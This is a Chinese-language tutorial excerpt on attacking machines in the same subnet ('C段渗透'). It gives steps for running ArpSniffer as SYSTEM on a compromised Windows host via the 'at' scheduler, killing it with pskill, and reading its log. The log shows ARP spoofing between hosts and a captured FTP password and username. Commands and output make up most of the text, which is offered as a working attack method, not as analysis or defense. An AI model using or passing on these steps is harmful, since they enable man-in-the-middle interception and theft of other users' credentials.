C段渗透攻击技术

Network Adapter 1: Intel(R) PRO/100+ PCI Adapter(这个地方选第五个参数)

 

Usage: ArpSniffer <IP1> <IP2> <Sniffer TCP Port> <LogFile> <NetAdp> [/RESET]

 

第五步:后台运行开始嗅探咯

C:\winnt\system32>at \\127.0.0.1 20:44 c:\winnt\a.bat

 

注意:这儿的时间要用24小时式

     arpsniffer最好拷到system32目录下,记录文件也会生成在这儿

     执行完第四步要先安装WINPCAP 2.1驱动

     同时arpsniffer要使用最新的0.5版,老版本有不少BUG而且要改注册表重启机子

 

第六步:看密码但是生成的记录文件不能直接看也不能拷贝所以我们只能先结束掉

以SYSTEM权限启动的ARPSniffer程序

C:\winnt\system32>pulist

...................

conime.exe        248  NT AUTHORITY\SYSTEM

explorer.exe      1864 SMSCOMPUTER\Administrator

CSRSS.EXE         2256 NT AUTHORITY\SYSTEM

Arpsniffer.exe    2322 NT AUTHORITY\SYSTEM       ----就是它了!

WINLOGON.EXE      2344 NT AUTHORITY\SYSTEM

......................

 

杀了它

C:\winnt\system32>pskill 2322

PsKill v1.03 - local and remote process killer

Copyright (C) 2000 Mark Russinovich

http://www.sysinternals.com 

 

Process 2322 killed.

 

C:\winnt\system32>type 1.txt       我的例子中嗅探的是FTP密码:)

 

...............

61.188.218.179(1404)->61.139.1.79(21)PASS aaabbb

61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.

61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.

61.188.218.179(1404)->61.139.1.79(21)QUIT

Get 61.139.1.65 Hardware Address: 00-00-0c-07-ac-02

Get 61.139.1.79 Hardware Address: 00-b0-d0-22-10-cb

Get 61.139.1.88 Hardware Address: 00-b0-d0-22-10-c6

 

Spoof 61.139.1.79: Mac of 61.139.1.65 ===> Mac of 61.139.1.88

Spoof 61.139.1.65: Mac of 61.139.1.79 ===> Mac of 61.139.1.88

有时这儿要先显示can not open driver(0)不管它等一下就可以了

Begin Sniffer.........